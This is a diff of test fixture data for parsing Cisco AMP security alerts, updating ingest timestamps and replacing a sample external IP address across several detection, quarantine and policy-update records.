@@ -2699,8 +2699,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322490604Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", + "ingested": "2021-12-09T13:35:29.222573400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-13T10:13:13.000Z", @@ -2721,7 +2721,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2776,7 +2776,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2786,8 +2786,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322492813Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", + "ingested": "2021-12-09T13:35:29.222579300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-13T10:13:08.000Z", @@ -2808,7 +2808,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2856,7 +2856,7 @@ "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2866,8 +2866,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322495198Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", + "ingested": "2021-12-09T13:35:29.222585300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2887,7 +2887,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2935,7 +2935,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2945,8 +2945,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322497481Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", + "ingested": "2021-12-09T13:35:29.222591200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-12T10:24:47.000Z", @@ -2967,7 +2967,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3007,7 +3007,7 @@ "Demo_AMP_Exploit_Prevention_Audit" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3017,8 +3017,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322499737Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222596900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -3035,7 +3035,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -3089,7 +3089,7 @@ "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3106,8 +3106,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322502030Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", + "ingested": "2021-12-09T13:35:29.222602600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -3129,7 +3129,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3174,7 +3174,7 @@ "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3184,8 +3184,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322504227Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", + "ingested": "2021-12-09T13:35:29.222606800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3205,7 +3205,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3264,7 +3264,7 @@ "7d9518ea3f98d037745352b23861fab05d3777dc" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3281,8 +3281,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322506452Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",